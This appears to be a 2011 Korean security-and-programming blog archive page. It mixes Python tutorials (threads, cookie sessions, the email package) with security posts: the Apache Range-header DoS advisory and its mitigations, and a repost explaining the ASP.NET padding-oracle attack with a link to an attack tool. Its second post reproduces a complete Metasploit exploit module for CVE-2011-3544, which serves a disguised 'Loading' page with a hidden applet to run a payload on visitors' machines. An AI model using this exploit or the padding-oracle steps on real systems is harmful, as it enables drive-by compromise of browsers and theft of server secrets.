'Hello_World!'에 해당되는 글 24건

2011.12.22 Python threads - a first example by bitfox
2011.12.01 [Remote Exploits] Java Applet Rhino Script Engine Remote Code Execution by bitfox
2011.11.30 파이썬 로그인 세션유지 by bitfox
2011.11.30 KillApachePy by bitfox
2011.10.19 How ASP.NET Security Vulnerability affects Kentico CMS by bitfox
2011.10.05 파이썬 v2.7.2 - email: Examples by bitfox
2011.10.05 Python - Sending Email using SMTP by bitfox
2011.10.05 Gmail의 SMTP를 이용한 메일 발송 by bitfox
2011.09.18 Range header DoS vulnerability in Apache 1.3 and Apache 2 by bitfox
2011.09.14 LFI With PHPInfo Assistance by bitfox

Python threads - a first example

Hello_World!/애플추가_파이썬 2011. 12. 22. 10:17

[참조] http://www.wellho.net/solutions/python-python-threads-a-first-example.html

Python threads - a first example

If you have a process that you want to do several things at the same time, threads may be the answer for you. They let you set up a series of processes (or sub-processes) each of which can be run independently, but which can be brought back together later and/or co-ordinated as they run.

저작자표시 비영리 변경금지

'Hello_World! > 애플추가_파이썬' 카테고리의 다른 글

파이썬 로그인 세션유지 (0)	2011.11.30
KillApachePy (0)	2011.11.30
파이썬 v2.7.2 - email: Examples (0)	2011.10.05
Python - Sending Email using SMTP (0)	2011.10.05
Gmail의 SMTP를 이용한 메일 발송 (0)	2011.10.05

Posted by bitfox

[Remote Exploits] Java Applet Rhino Script Engine Remote Code Execution

Hello_World!/오라절친_JSP 2011. 12. 1. 08:57

## 

# This file is part of the Metasploit Framework and may be subject to 

# redistribution and commercial restrictions. Please see the Metasploit 

# Framework web site for more information on licensing and terms of use. 

# http://metasploit.com/framework/ 

## 

require 'msf/core'

require 'rex'

class Metasploit3 < Msf::Exploit::Remote 

    Rank = ExcellentRanking 

    include Msf::Exploit::Remote::HttpServer::HTML

    def initialize( info = {} ) 

        super( update_info( info, 

            'Name'          => 'Java Applet Rhino Script Engine Remote Code Execution', 

            'Description'   => %q{ 

                    This module exploits a vulnerability in the Rhino Script Engine that 

                can be used by a Java Applet to run arbitrary Java code outside of 

                the sandbox.  The vulnerability affects version 7 and version 6 update 

                27 and earlier, and should work on any browser that supports Java 

                (for example: IE, Firefox, Google Chrome, etc) 

            }, 

            'License'       => MSF_LICENSE, 

            'Author'        => 

                [ 

                    'Michael Schierl', # Discovery 

                    'juan vazquez',    # metasploit module 

                    'Edward D. Teach <teach@consortium-of-pwners.net>', 

                    'sinn3r'

                ], 

            'References'    => 

                [ 

                    [ 'CVE', '2011-3544' ], 

                    [ 'OSVDB', '76500' ], # 76500 and 76499 have contents mixed 

                    [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-305/' ], 

                    [ 'URL', 'http://schierlm.users.sourceforge.net/CVE-2011-3544.html' ], 

                ], 

            'Platform'      => [ 'java', 'win', 'linux' ], 

            'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, 

            'Targets'       => 

                [ 

                    [ 'Generic (Java Payload)', 

                        { 

                            'Arch' => ARCH_JAVA, 

                        } 

                    ], 

                    [ 'Windows Universal', 

                        { 

                            'Arch' => ARCH_X86, 

                            'Platform' => 'win'

                        } 

                    ], 

                    [ 'Apple OSX', 

                        { 

                            'ARCH' => ARCH_X86, 

                            'Platform' => 'osx'

                        } 

                    ], 

                    [ 'Linux x86', 

                        { 

                            'Arch' => ARCH_X86, 

                            'Platform' => 'linux'

                        } 

                    ] 

                ], 

            'DefaultTarget'  => 0, 

            'DisclosureDate' => 'Oct 18 2011'

            )) 

    end

    def on_request_uri( cli, request ) 

        if not request.uri.match(/\.jar$/i) 

            if not request.uri.match(/\/$/) 

                send_redirect(cli, get_resource() + '/', '') 

                return

            end

            print_status("#{self.name} handling request from #{cli.peerhost}:#{cli.peerport}...") 

            send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } ) 

            return

        end

        paths = [ 

            [ "Exploit.class" ] 

        ] 

        p = regenerate_payload(cli) 

        jar  = p.encoded_jar 

        paths.each do |path| 

            1.upto(path.length - 1) do |idx| 

                full = path[0,idx].join("/") + "/"

                if !(jar.entries.map{|e|e.name}.include?(full)) 

                    jar.add_file(full, '') 

                end

            end

            fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "cve-2011-3544", path ), "rb") 

            data = fd.read(fd.stat.size) 

            jar.add_file(path.join("/"), data) 

            fd.close 

        end

        print_status( "Sending Applet.jar to #{cli.peerhost}:#{cli.peerport}..." ) 

        send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } ) 

        handler( cli ) 

    end

    def generate_html 

        html  = "<html><head><title>Loading, Please Wait...</title></head>"

        html += "<body><center><p>Loading, Please Wait...</p></center>"

        html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">"

        html += "</applet></body></html>"

        return html 

    end

[출처] exploit-db

[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.

저작자표시 비영리 변경금지

'Hello_World! > 오라절친_JSP' 카테고리의 다른 글

관리자 페이지 IP 제한 (0)	2011.08.11
Hello World in JSP (0)	2011.08.11

Posted by bitfox

파이썬 로그인 세션유지

Hello_World!/애플추가_파이썬 2011. 11. 30. 17:48

If you want to keep the authentication you need to reuse the cookie. I'm not sure if urllib2 is available in python 2.3.4 but here is an example on how to do it:

req1 = urllib2.Request(url1) 

response = urllib2.urlopen(req1) 

cookie = response.headers.get('Set-Cookie') 

 

# Use the cookie is subsequent requests 

req2 = urllib2.Request(url2) 

req2.add_header('cookie', cookie) 

response = urllib2.urlopen(req2)

-------------------------------------------------------------------------

If this is cookie based authentication use HTTPCookieProcessor:

import cookielib, urllib2 

cj = cookielib.CookieJar() 

opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) 

r = opener.open("http://example.com/")

If this is HTTP authentication use basic or digest AuthHandler:

import urllib2 

# Create an OpenerDirector with support for Basic HTTP Authentication... 

auth_handler = urllib2.HTTPBasicAuthHandler() 

auth_handler.add_password(realm='PDQ Application', 

                          uri='https://mahler:8092/site-updates.py', 

                          user='klem', 

                          passwd='kadidd!ehopper') 

opener = urllib2.build_opener(auth_handler) 

# ...and install it globally so it can be used with urlopen. 

urllib2.install_opener(opener) 

urllib2.urlopen('http://www.example.com/login.html')

... and use same opener for every request.

[출처] http://stackoverflow.com/questions/923296/keeping-a-session-in-python-while-making-http-requests

저작자표시 비영리 변경금지

'Hello_World! > 애플추가_파이썬' 카테고리의 다른 글

Python threads - a first example (0)	2011.12.22
KillApachePy (0)	2011.11.30
파이썬 v2.7.2 - email: Examples (0)	2011.10.05
Python - Sending Email using SMTP (0)	2011.10.05
Gmail의 SMTP를 이용한 메일 발송 (0)	2011.10.05

Posted by bitfox

KillApachePy

Hello_World!/애플추가_파이썬 2011. 11. 30. 09:28

CVE-2011-3192 취약점을 이용한 아파치 서버를 멈추게 하는 툴이 파이썬 버젼으로 나왔습니다. 아주 간단한 명령어 한줄로 아파치 서버를 멈추게 할 수 있으니 패치바랍니다.

펄 버젼은 예전에 갖고 있었는데 공개하기가 참....그렇습니다. 파이썬 또한 그러네요..접..

취약점 간단 요약..
-----------------------------------------------------------------
Title:       Range header DoS vulnerability Apache HTTPD prior to 2.2.20.

CVE:         CVE-2011-3192
Last Change: 20110831 1800Z
Date:        20110824 1600Z
Product:     Apache HTTPD Web Server
Versions:    Apache 2.0 - all versions prior to 2.2.20 and prior to 2.0.65
             Apache 1.3 is NOT vulnerable.
-----------------------------------------------------------------

Apache HTTPD Security ADVISORY
          ==============================
                UPDATE 3 - FINAL

Title:       Range header DoS vulnerability Apache HTTPD prior to 2.2.20.

CVE:         CVE-2011-3192
Last Change: 20110831 1800Z
Date:        20110824 1600Z
Product:     Apache HTTPD Web Server
Versions:    Apache 2.0 - all versions prior to 2.2.20 and prior to 2.0.65
             Apache 1.3 is NOT vulnerable.

Changes since last update
=========================
2.2.20 has a fix, 2.2.21 an improved one. Version 1.3 is not vulnerable.
Further regex/rule improvements. Explained DoS. Added wiki link.
Highlight fact that LimitRequestFieldSize workaround was insufficient.

Changes since update 1
=========================
In addition to the 'Range' header - the 'Request-Range' header is equally
affected. Furthermore various vendor updates, improved regexes (speed and
accommodating a different and new attack pattern).

Description:
============

A denial of service vulnerability has been found in the way the multiple
overlapping ranges are handled by the Apache HTTPD server prior to version
2.2.20:

     http://seclists.org/fulldisclosure/2011/Aug/175

An attack tool is circulating in the wild. Active use of this tool has
been observed.

The attack can be done remotely and with a modest number of requests can
cause very significant memory and CPU usage on the server.

The default Apache httpd installations version 2.0 prior to 2.0.65 and
version 2.2 prior to 2.2.20 are vulnerable.

Apache 2.2.20 does fix this issue; however with a number of side effects
(see release notes). Version 2.2.21 corrects a protocol defect in 2.2.20,
and also introduces the MaxRanges directive.

Version 2.0.65 has not been released, but will include this fix, and is
anticipated in September.

Apache 1.3
==========

Apache 1.3 is NOT vulnerable. However as explained in the background section
in more detail - this attack does cause a significant and possibly unexpected
load. You are advised to review your configuration in that light.

Type of Attack
==============

This vulnerability concerns a 'Denial of Service' attack. This means that
a remote attacker, under the right circumstances, is able to slow your
service or server down to a crawl or exhausting memory available to serve
requests, leaving it unable to serve legitimate clients in a timely manner.

There are no indications that this leads to a remote exploit; where a
third party can compromise your security and gain foothold of the server
itself. The result of this vulnerability is purely one of denying service
by grinding your server down to a halt and refusing additional connections
to the server.

Background and the 2007 report
==============================

There are two aspects to this vulnerability. One is new, is Apache specific;
and resolved with this server side fix. The other issue is fundamentally a
protocol design issue dating back to 2007:

      http://seclists.org/bugtraq/2007/Jan/83

The contemporary interpretation of the HTTP protocol (currently) requires a
server to return multiple (overlapping) ranges; in the order requested. This
means that one can request a very large range (e.g. from byte 0- to the end)
100's of times in a single request.

Being able to do so is an issue for (probably all) webservers and currently
subject of an IETF discussion to change the protocol:

      http://trac.tools.ietf.org/wg/httpbis/trac/ticket/311

This advisory details a problem with how Apache httpd and its so called
internal 'bucket brigades' deal with serving such "valid" request. The
problem is that currently such requests internally explode into 100's of
large fetches, all of which are kept in memory in an inefficient way. This
is being addressed in two ways. By making things more efficient. And by
weeding out or simplifying requests deemed too unwieldy.

FIX
====

This vulnerability has been fixed in release 2.2.20 and further corrected
in 2.2.21. You are advised to upgrade to version 2.2.21 (or newer) or the
legacy 2.0.65 release, once this is published (anticipated in September).

If you cannot upgrade, or cannot wait to upgrade - you can apply the
appropriate source code patch and recompile a recent existing version;

http://www.apache.org/dist/httpd/patches/apply_to_2.2.14/ (for 2.2.9 - .14)
http://www.apache.org/dist/httpd/patches/apply_to_2.2.19/ (for 2.2.15 - .19)
http://www.apache.org/dist/httpd/patches/apply_to_2.0.64/ (for 2.0.55 - .64)

If you cannot upgrade and/or cannot apply above patches in a timely manner
then you should consider to apply one or more of the mitigation suggested below.

CAVEATS
=======

Note that this fix 1) will return a "200 OK" in cases where a 206 respond would
be larger and 2) changes the behavior of chunked responses. This may affect
certain clients. See the above background section and IETF reference for
more detail and the various discussions around fixing this in the protocol.

Furthermore a request with a byterange beyond the end of the file used to
return 416 but now returns 200. This is a violation of a RFC2616 SHOULD.

Mitigation:
===========

There are several immediate options to mitigate this issue until a full fix
is available. Below examples handle both the 'Range' and the legacy
'Request-Range' with various levels of care.

Note that 'Request-Range' is a legacy name dating back to Netscape Navigator
2-3 and MSIE 3. Depending on your user community - it is likely that you
can use option '3' safely for this older 'Request-Range'.

0) Consult http://httpd.apache.org/security/CVE-2011-3192.txt for the most
   recent information (as this is the final advisory).

1) Use SetEnvIf or mod_rewrite to detect a large number of ranges and then
   either ignore the Range: header or reject the request.

   Option 1: (Apache 2.2, requires mod_setenvif and mod_headers)

          # Drop the Range header when more than 5 ranges.
          # CVE-2011-3192
          SetEnvIf Range (?:,.*?){5,5} bad-range=1
          RequestHeader unset Range env=bad-range

          # We always drop Request-Range; as this is a legacy
          # dating back to MSIE3 and Netscape 2 and 3.
          #
          RequestHeader unset Request-Range

          # optional logging.
          CustomLog logs/range-CVE-2011-3192.log common env=bad-range

   Above may not work for all configurations. In particular situations
   mod_cache and (language) modules may act before the 'unset'
   is executed upon during the 'fixup' phase.

   Option 2: (Pre 2.2, requires mod_rewrite and mod_headers)

          # Reject request when more than 5 ranges in the Range: header.
          # CVE-2011-3192
          #
          RewriteEngine on
          RewriteCond %{HTTP:range} !(^bytes=[^,]+(,[^,]+){0,4}$|^$) [NC]
          RewriteRule .* - [F]

          # We always drop Request-Range; as this is a legacy
          # dating back to MSIE3 and Netscape 2 and 3.
          #
          RequestHeader unset Request-Range

   The number 5 is arbitrary. Several 10's should not be an issue and may be
   required for sites which for example serve PDFs to very high end eReaders
   or use things such complex http based video streaming.

   WARNING These directives need to be specified in every configured
   vhost, or inherited from server context as described in:
   http://httpd.apache.org/docs/current/mod/mod_rewrite.html#vhosts

2) Use mod_headers to completely dis-allow the use of Range headers:

          RequestHeader unset Range

   Note that this may break certain clients - such as those used for
   e-Readers and progressive/http-streaming video.

   Furthermore to ignore the Netscape Navigator 2-3 and MSIE 3 specific
   legacy header - add:

          RequestHeader unset Request-Range

   Unlike the commonly used 'Range' header - dropping the 'Request-Range'
   is not likely to affect many clients.

4) Deploy a Range header count module as a temporary stopgap measure.

   A stop-gap module which is runtime-configurable can be found at:

     http://people.apache.org/~fuankg/httpd/mod_rangecnt-improved/

   A simpler stop-gap module which requires compile-time configuration
   is also available:

     http://people.apache.org/~dirkx/mod_rangecnt.c

Note
====

Earlier advisories suggested the use of LimitRequestFieldSize. This mitigation
was not fully effective and can by bypassed by splitting the attack vector up
across multiple headers. Therefore you should not rely on LimitRequestFieldSize
alone.

OS and Vendor specific information
==================================

Red Hat:        Has additional RHEL specific information at:
                https://bugzilla.redhat.com/show_bug.cgi?id=732928

NetWare:        Pre compiled binaries are available;
                runtime-configurable:
                http://people.apache.org/~fuankg/httpd/mod_rangecnt-improved/
                compile-time configured for 5 ranges:
                http://people.apache.org/~fuankg/httpd/mod_rangecnt/

Win32:          Pre compiled binaries are available;
                runtime-configurable:
                http://people.apache.org/~gsmith/httpd/binaries/modules/mod_rangecnt-improved/
                compile-time configured for 5 ranges:
                http://people.apache.org/~gsmith/httpd/binaries/modules/mod_rangecnt/

mod_security:   Has updated their rule set; see
                http://blog.spiderlabs.com/2011/08/mitigation-of-apache-range-header-dos-attack.html

Actions:
========

Apache HTTPD users who are concerned about a DoS attack against their server
should 1) upgrade to version 2.2.21 (or 2.0.65 when it becomes available),
2) if not possible - apply the provided patches or 3) consider implementing
any of the above mitigation immediately.

When using a third party attack tool to verify vulnerability - note that most
of the versions in the wild currently check for the presence of mod_deflate;
and will (mis)report that your server is not vulnerable if this module is not
present. This vulnerability is not dependent on presence or absence of
that module.

Planning:
=========

No further advisory email announcements are planned. However we will track
minor refinements of this advisory at;

http://httpd.apache.org/security/CVE-2011-3192.txt

Further recommendations and discussion on workarounds, or user-agent
specific complications of these fixes will be tracked at;

http://wiki.apache.org/httpd/CVE-2011-3192

패치 방법 아래 링크 참조
http://httpd.apache.org/security/CVE-2011-3192.txt

[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.

저작자표시 비영리 변경금지

'Hello_World! > 애플추가_파이썬' 카테고리의 다른 글

Python threads - a first example (0)	2011.12.22
파이썬 로그인 세션유지 (0)	2011.11.30
파이썬 v2.7.2 - email: Examples (0)	2011.10.05
Python - Sending Email using SMTP (0)	2011.10.05
Gmail의 SMTP를 이용한 메일 발송 (0)	2011.10.05

Posted by bitfox

How ASP.NET Security Vulnerability affects Kentico CMS

Hello_World!/마소친구_ASP 2011. 10. 19. 13:12

asp.net의 잘못된 셋팅시 ScriptResource.axd 또는 WebResource.axd를 이용하여 web.config 파일의 중요정보를 획득할 수 있다. 아래 링크를 통해 취약점을 알아보고 대비하자.
(이와 같은 취약점 : http://bitfox.tistory.com/159 참조)

http://devnet.kentico.com/Blogs/Martin-Hejtmanek/September-2010/How-ASP-NET-Security-Vulnerability-affects-Kentico.aspx

tool download
https://github.com/GDSSecurity/PadBuster

How ASP.NET Security Vulnerability affects Kentico CMS

There is a lot of buzz about recently published ASP.NET security vulnerability and it truly is important. Read this post to see how it may affect your sites ... right now if you can!

Hi there,

As you probably already know, there is a very serious bug in ASP.NET security that allows the attacker to get sensitive information from ASP.NET web site. You can find more details about it here:

http://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx

and here are the FAQs:

http://weblogs.asp.net/scottgu/archive/2010/09/20/frequently-asked-questions-about-the-asp-net-security-vulnerability.aspx

I didn't want to just mirror the same information that is already all around the internet so before I wrote this post, I spent the whole last day in checking the details of this issue, how it really works and what could be potential options to prevent that but keep your web site functionality intact. From the posts above, you see that the recommended solution is not exactly most friendly one in all cases. But I can definitely confirm that it works os it may be at least temporary solution.

What is important is that this is in the core of the .NET, and heavily used feature (basically even standard WebForms model and AJAX are built on it), so everything out there is potentially affected by this, no matter if you use Kentico CMS, Sharepoint or CMSxyz built on ASP.NET.

What exactly is the security issue?

I do not want to judge any programmer that is responsible for this but the fact is that the creators of ASP.NET Framework let the door for the attackers half open.

What ASP.NET Framework provides is a handler WebResource.axd (or ScriptResource.axd, doesn't really matter), that provides a way how to retrieve physical files of any kind from your web file system. You can see how this is supported if you add something like this on your page:

<asp:ScriptManager runat="server" ID="manScr">

<asp:ScriptReference Path="~/web.config" />

</Scripts>

</CompositeScript>

</asp:ScriptManager>

I intentionally used path to web.config, because that is exactly where reported the problem lies. If you look at the output of the page, it renders something like this:

And if you query the URL, you simply get the web.config code. This is how the attacker is able to get your sensitive data which doesn't have to be only the machineKey, but can be also your connection string to database or anything else for that matter.

As you surely guessed right, the "d" parameter contains the locator of the resource, somehow encrypted. So far, it seems fine until somebody is able to guess or encode the resource identificator. Once he can get the correct one or the encryption key, he can access anything and simply generate those keys.

This solution of theirs basically has only single point of breach which is the encrypted resource key itself. If there would be additional precaution, like allowing only certain types of files to be retrieved, the security issue wouldn't be that bad for everyone, but it unfortunately is.

How the attacker gets the key?

Although breaking the cipher via brute force may seem hard enough, there are ways how to get there quite easily, if the solution isn't robust enough to eliminate just every possibility.

What is typically used to break the ciphers is something called Side channel. Side channel is an information of any type that can leak out from the process and tell the attacker how his particular attack proceeded. Side channel can be really anything and it isn't anyhow based only on software implementation, it can be also part of the hardware. For example, if you try to hack the ATM with electronic device connected to your laptop simulating the credit card, even the time in which the particular request is processed (e.g. longer if succeeds, shorter in case of error, or specific number of cycles executed) can tell the attacker how successful he was until he breaks the cipher going the right way. The creators of sich devices fight against this by incorporating random waits or ensuring that any operation takes same amount of time using delayers. These side channel clues serve the attacker as some sort of oracle to reduce the number of options. Same thing with the software implementations. Any information that can leak out from any security process significantly reduces the number of options. If you want to know more about side channels, try to start here:

http://en.wikipedia.org/wiki/Side_channel_attack

In this particular case of ASP.NET vulnerability, the Side channel clearly is the difference between "Page not found" and "Cryptographic exception". You can get the first one if you link to the non-existing file, and the second one if you attempt to change the URL to the resource.

Very bad thing about AES algorithm that is used by these resources is that it already has known side channels specific to padding of the encrypted data so it is not that hard to break it as you can see here:

http://www.youtube.com/watch?v=yghiC_U2RaM&hd=1

This is exactly what an attacker can do.

One other issue of this is that the length of the encrypted resource key is depending on the length of the data value which means the attacker can use much shorter data to attack and further reduce the number of options. That is another side channel in this particular case.

So what the attacker does is he attempts to partial-guess (using the oracle) the machine key used for encryption of particular key, either one that he chooses or some default one (WebForms link script WebForms.js which has known format of decrypted data and is used on almost any web site implemented through ASP.NET). He basically requests the files until he gets 404 which means the cryptography part has succeded. Once he gets the machine key, he can generate any resource key he wishes. Specifically with the web.config, the decrypted key looks like:

Q|~/web.config|#|298f20c0

Not exactly sure what is the second part (timestamp or hash maybe) but clearly the first part locates the resource. So the attacker generates the URL using this resource locator, and requests the resource. Now he gets the web.config file with all the sensitive information or any other file your web site can access the same way.

How to prevent that?

Now you know how it works on the attacker side which is important so you can understand why the recommended solutions are the way they are. What we need to do is basically to close the side channel which in this case is the error reporting. That is why the official recommendation is to basically provide single error for any case. They suggest following settings:

<system.web>

</system.web>

</configuration>

Note that do not even want to make a difference between Not found and other errors, since it would provide the same side channel.

While this seems OK, it may be a two-bladed sword. If you enable this on the whole web site, you may get some unwanted behavior because from that point on, all errors will be reported as the same giving the site visitor some false information (unless you can somehow cover all situations in your error file).

I understand why they are suggesting this, they want to prevent all potential bugs caused by the same thing in other locations.

So far, it seems to me like restricting the errors only for the particular files is also OK, because the errors we want to prevent come from these files only:

<system.web>

</system.web>

</location>

<system.web>

</system.web>

</location>

So adding this to your web.config should keep all your standard pages intact, while the side channel on those particular files is closed.

Other precautions

While all this may seem to be enough to do and you may think that you are safe, I am a little paranoic when it comes to security so I believe in quite opposite scenario. Hacking is a good businness nowadays and the hackers won't let such opportunity to slip between their fingers. You have implemented a precaution that itself is just a workaround and does not ensure you that it covers all potential side channels. Not only that, your web site could have been already compromised without you knowing that.

So definitely do not end here, but continue (in fact that is what you should always do, not only in this case):

•Backup your site more often until the patch for this from Microsoft is ready.

•When the patch is available, immediately apply it.

•Implement the recommended workaround. If it doesn't break your web site functionality, use it on the whole web site. If it does, at least use the option with locations.

•Check out all the news about this issue in case someone would find some other way that the workaround doesn't cover. You should do the same even after the patch is out just in case they didn't fix everything.

•Check your security settings on all servers, if possible allow only the web server IP to access the SQL server.

•If you have such option, use some flood control, as you could see on the video, it still requires a lot of requests in a short time, so if you prevent it in some way, you will have enough time to fight against it.

•Check out your event logs on a regular basis and search for any too frequent error patterns.

•If you have any suspicion that your web site could have been already compromised, require from all users that they change their passwords, change the machineKey and other passwords to other servers.

•With Kentico CMS, you may at least temporarily disable the admin UI if you know you won't need it with following web.config key: <add key="CMSDisableAdministrationInterface" value="true" />

The patch they are preparing will probably use one of these approaches:

•Limiting the files you can retrieve to just specific types (which may make some existing applications not work properly if they will use some "special" files, not Kentico case which is good).

•Implementing other algorithm for encrypting the resource keys (which will be supported anywhere but will probably need some configuration change).

One way or another, you need to be careful no matter if you use Kentico CMS or any other ASP.NET application at least until the patch is out and applied and few weeks after that.

Unfortunately, we cannot fix this since it lies in the core of ASP.NET so you need to go with the workaround at this point which may and may not be good enough. What may be calming for some of you is that there are currently thousands of buggy web sites out there more important for the hackers than yours, but you definitely shouldn't count with it as a sure thing, especially if you have some enemies behind you.

In case you know any update on this or can add some more imporant information, feel free to post it into the comments. Thank you!

See you later ... hopefully with some nicer topic

padBuster.pl

[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.

저작자표시 비영리 변경금지

'Hello_World! > 마소친구_ASP' 카테고리의 다른 글

관리자 페이지 IP 제한 (0)	2011.08.11
Hello World in ASP (0)	2011.08.11
Hello World in ASPX (0)	2011.08.11

Posted by bitfox

파이썬 v2.7.2 - email: Examples

Hello_World!/애플추가_파이썬 2011. 10. 5. 14:49

Here are a few examples of how to use the email package to read, write, and send simple email messages, as well as more complex MIME messages.

First, let’s see how to create and send a simple text message:

# Import smtplib for the actual sending function
import smtplib

# Import the email modules we'll need
from email.mime.text import MIMEText

# Open a plain text file for reading.  For this example, assume that
# the text file contains only ASCII characters.
fp = open(textfile, 'rb')
# Create a text/plain message
msg = MIMEText(fp.read())
fp.close()

# me == the sender's email address
# you == the recipient's email address
msg['Subject'] = 'The contents of %s' % textfile
msg['From'] = me
msg['To'] = you

# Send the message via our own SMTP server, but don't include the
# envelope header.
s = smtplib.SMTP('localhost')
s.sendmail(me, [you], msg.as_string())
s.quit()

And parsing RFC822 headers can easily be done by the parse(filename) or parsestr(message_as_string) methods of the Parser() class:

# Import the email modules we'll need
from email.parser import Parser

#  If the e-mail headers are in a file, uncomment this line:
#headers = Parser().parse(open(messagefile, 'r'))

#  Or for parsing headers in a string, use:
headers = Parser().parsestr('From: <user@example.com>\n'
        'To: <someone_else@example.com>\n'
        'Subject: Test message\n'
        '\n'
        'Body would go here\n')

#  Now the header items can be accessed as a dictionary:
print 'To: %s' % headers['to']
print 'From: %s' % headers['from']
print 'Subject: %s' % headers['subject']

Here’s an example of how to send a MIME message containing a bunch of family pictures that may be residing in a directory:

# Import smtplib for the actual sending function
import smtplib

# Here are the email package modules we'll need
from email.mime.image import MIMEImage
from email.mime.multipart import MIMEMultipart

COMMASPACE = ', '

# Create the container (outer) email message.
msg = MIMEMultipart()
msg['Subject'] = 'Our family reunion'
# me == the sender's email address
# family = the list of all recipients' email addresses
msg['From'] = me
msg['To'] = COMMASPACE.join(family)
msg.preamble = 'Our family reunion'

# Assume we know that the image files are all in PNG format
for file in pngfiles:
    # Open the files in binary mode.  Let the MIMEImage class automatically
    # guess the specific image type.
    fp = open(file, 'rb')
    img = MIMEImage(fp.read())
    fp.close()
    msg.attach(img)

# Send the email via our own SMTP server.
s = smtplib.SMTP('localhost')
s.sendmail(me, family, msg.as_string())
s.quit()

Here’s an example of how to send the entire contents of a directory as an email message: [1]

#!/usr/bin/env python

"""Send the contents of a directory as a MIME message."""

import os
import sys
import smtplib
# For guessing MIME type based on file name extension
import mimetypes

from optparse import OptionParser

from email import encoders
from email.message import Message
from email.mime.audio import MIMEAudio
from email.mime.base import MIMEBase
from email.mime.image import MIMEImage
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

COMMASPACE = ', '


def main():
    parser = OptionParser(usage="""\
Send the contents of a directory as a MIME message.

Usage: %prog [options]

Unless the -o option is given, the email is sent by forwarding to your local
SMTP server, which then does the normal delivery process.  Your local machine
must be running an SMTP server.
""")
    parser.add_option('-d', '--directory',
                      type='string', action='store',
                      help="""Mail the contents of the specified directory,
                      otherwise use the current directory.  Only the regular
                      files in the directory are sent, and we don't recurse to
                      subdirectories.""")
    parser.add_option('-o', '--output',
                      type='string', action='store', metavar='FILE',
                      help="""Print the composed message to FILE instead of
                      sending the message to the SMTP server.""")
    parser.add_option('-s', '--sender',
                      type='string', action='store', metavar='SENDER',
                      help='The value of the From: header (required)')
    parser.add_option('-r', '--recipient',
                      type='string', action='append', metavar='RECIPIENT',
                      default=[], dest='recipients',
                      help='A To: header value (at least one required)')
    opts, args = parser.parse_args()
    if not opts.sender or not opts.recipients:
        parser.print_help()
        sys.exit(1)
    directory = opts.directory
    if not directory:
        directory = '.'
    # Create the enclosing (outer) message
    outer = MIMEMultipart()
    outer['Subject'] = 'Contents of directory %s' % os.path.abspath(directory)
    outer['To'] = COMMASPACE.join(opts.recipients)
    outer['From'] = opts.sender
    outer.preamble = 'You will not see this in a MIME-aware mail reader.\n'

    for filename in os.listdir(directory):
        path = os.path.join(directory, filename)
        if not os.path.isfile(path):
            continue
        # Guess the content type based on the file's extension.  Encoding
        # will be ignored, although we should check for simple things like
        # gzip'd or compressed files.
        ctype, encoding = mimetypes.guess_type(path)
        if ctype is None or encoding is not None:
            # No guess could be made, or the file is encoded (compressed), so
            # use a generic bag-of-bits type.
            ctype = 'application/octet-stream'
        maintype, subtype = ctype.split('/', 1)
        if maintype == 'text':
            fp = open(path)
            # Note: we should handle calculating the charset
            msg = MIMEText(fp.read(), _subtype=subtype)
            fp.close()
        elif maintype == 'image':
            fp = open(path, 'rb')
            msg = MIMEImage(fp.read(), _subtype=subtype)
            fp.close()
        elif maintype == 'audio':
            fp = open(path, 'rb')
            msg = MIMEAudio(fp.read(), _subtype=subtype)
            fp.close()
        else:
            fp = open(path, 'rb')
            msg = MIMEBase(maintype, subtype)
            msg.set_payload(fp.read())
            fp.close()
            # Encode the payload using Base64
            encoders.encode_base64(msg)
        # Set the filename parameter
        msg.add_header('Content-Disposition', 'attachment', filename=filename)
        outer.attach(msg)
    # Now send or store the message
    composed = outer.as_string()
    if opts.output:
        fp = open(opts.output, 'w')
        fp.write(composed)
        fp.close()
    else:
        s = smtplib.SMTP('localhost')
        s.sendmail(opts.sender, opts.recipients, composed)
        s.quit()


if __name__ == '__main__':
    main()

Here’s an example of how to unpack a MIME message like the one above, into a directory of files:

#!/usr/bin/env python

"""Unpack a MIME message into a directory of files."""

import os
import sys
import email
import errno
import mimetypes

from optparse import OptionParser


def main():
    parser = OptionParser(usage="""\
Unpack a MIME message into a directory of files.

Usage: %prog [options] msgfile
""")
    parser.add_option('-d', '--directory',
                      type='string', action='store',
                      help="""Unpack the MIME message into the named
                      directory, which will be created if it doesn't already
                      exist.""")
    opts, args = parser.parse_args()
    if not opts.directory:
        parser.print_help()
        sys.exit(1)

    try:
        msgfile = args[0]
    except IndexError:
        parser.print_help()
        sys.exit(1)

    try:
        os.mkdir(opts.directory)
    except OSError, e:
        # Ignore directory exists error
        if e.errno != errno.EEXIST:
            raise

    fp = open(msgfile)
    msg = email.message_from_file(fp)
    fp.close()

    counter = 1
    for part in msg.walk():
        # multipart/* are just containers
        if part.get_content_maintype() == 'multipart':
            continue
        # Applications should really sanitize the given filename so that an
        # email message can't be used to overwrite important files
        filename = part.get_filename()
        if not filename:
            ext = mimetypes.guess_extension(part.get_content_type())
            if not ext:
                # Use a generic bag-of-bits extension
                ext = '.bin'
            filename = 'part-%03d%s' % (counter, ext)
        counter += 1
        fp = open(os.path.join(opts.directory, filename), 'wb')
        fp.write(part.get_payload(decode=True))
        fp.close()


if __name__ == '__main__':
    main()

Here’s an example of how to create an HTML message with an alternative plain text version: [2]

#!/usr/bin/env python

import smtplib

from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

# me == my email address
# you == recipient's email address
me = "my@email.com"
you = "your@email.com"

# Create message container - the correct MIME type is multipart/alternative.
msg = MIMEMultipart('alternative')
msg['Subject'] = "Link"
msg['From'] = me
msg['To'] = you

# Create the body of the message (a plain-text and an HTML version).
